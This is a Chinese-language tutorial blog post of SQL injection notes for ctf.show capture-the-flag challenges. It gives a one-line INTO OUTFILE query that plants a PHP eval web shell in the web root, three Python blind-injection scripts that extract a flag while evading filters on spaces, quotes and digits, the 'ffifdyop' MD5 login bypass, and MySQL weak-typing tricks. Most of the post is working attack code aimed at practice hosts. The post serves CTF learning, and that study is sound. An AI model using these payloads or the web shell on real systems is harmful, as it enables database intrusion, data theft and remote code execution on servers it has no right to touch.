Java教程
SQL注入-1
本文主要是介绍SQL注入-1,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
过滤某些字符
使用Replace进行替代
如过滤数字
select username, replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password, 0, '!'), 1, '@'), 2, '#'), 3, '$'), 4, '%'), 5, '^'), 6, '&'), 7, '*'), 8, '('), 9, ')') from user;
直接写shell
SELECT 1, '<?php @eval($_POST[x]);?>' INTO OUTFILE '/var/www/html/1.php'
bool盲注小脚本
无空格
import requests
import time
def get_response(result):
url = 'http://e952e288-3d6c-4c73-9f3c-9bdf904827d5.challenge.ctf.show/select-waf.php'
payload = "`ctfshow_user`where`pass`regexp'^{}'"
dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
data = {
'tableName': payload
}
for word in dic:
data['tableName'] = payload.format(result + word)
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('$user_count = 1;') > 0:
result += word
return result
if __name__ == '__main__':
result = ''
for i in range(55):
result = get_response(result)
print(result)
有空格无引号
import requests
import time
def str2hex(string):
result = ''
for word in string:
result += hex(ord(word))
return result.replace('0x', '')
def get_response(result):
url = 'http://61dea855-662d-4843-bd43-4518d01c80f6.challenge.ctf.show/select-waf.php'
payload = "ctfshow_user group by pass having pass regexp(0x{})"
dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
data = {
'tableName': payload
}
for word in dic:
data['tableName'] = payload.format(str2hex(result) + str2hex(word))
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('$user_count = 1;') > 0:
result += word
return result
if __name__ == '__main__':
result = ''
for i in range(55):
result = get_response(result)
print(result)
有空格无引号无数字
import requests
import time
true_dict = {
'0': 'false',
'1': 'true',
}
for i in range(2, 10):
true_dict[str(i)] = true_dict['1'] + '+true' * (i - 1)
def word2char(word):
num = str(ord(word))
result = 'char(concat('
for i in range(len(num)):
if i == 0:
result += '(' + true_dict[num[i]] + ')'
else:
result += ',(' + true_dict[num[i]] + ')'
result += '))'
return result
def sentence2true(string):
final_pass = ''
if string:
for i in range(len(string)):
if i == 0:
final_pass += word2char(string[i])
else:
final_pass += ',' + word2char(string[i])
final_pass += ''
return final_pass
def get_response(result):
url = 'http://283b4efa-e5be-454c-8b79-58af5d20673d.challenge.ctf.show/select-waf.php'
payload = "ctfshow_user group by pass having pass regexp(concat(char(concat((true+true+true+true+true+true+true+true+true),(true+true+true+true))),{}))"
dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
data = {
'tableName': payload
}
for word in dic:
data['tableName'] = payload.format(sentence2true(result + word))
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('$user_count = 1;') > 0:
result += word
return result
if __name__ == '__main__':
result = ''
for i in range(55):
result = get_response(result)
print(result)
ffifdyop 绕过
经过md5加密后:276f722736c95d99e921722cf9ed621c
再转换为字符串:'or'6<乱码> 即 'or'66�]��!r,��b
用法
select * from admin where password=''or'6<乱码>'
就相当于select * from admin where password=''or 1 实现sql注入
MySQL弱类型
select pass from ctfshow_user where username = 0; # 返回所有字母开头的字符串 select pass from ctfshow_user where username = 1; # 返回所有有且仅以1开头的字符串
这篇关于SQL注入-1的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
后台交互资料入门指南11-14
-
如何轻松创建项目环境:新手入门教程11-14
-
如何抽离公共代码:初级开发者指南11-14
-
Python编程入门指南11-14
-
Python编程入门:如何获取参数11-14
-
JWT 用户校验:简单教程与实践11-14
-
Pre-commit 自动化测试入门指南11-14
-
Python编程基础11-14
-
Server Action入门教程:轻松掌握服务器操作11-14
-
Server Component入门教程:轻松搭建服务器组件11-14
-
用useRequest实现数据请求的简单教程11-14
-
RestfulAPI课程:初学者的全面指南11-14
-
Server Action课程:入门级教程11-14
-
Server Component课程入门指南11-14
-
dnd-kit学习:初学者指南11-14
栏目导航
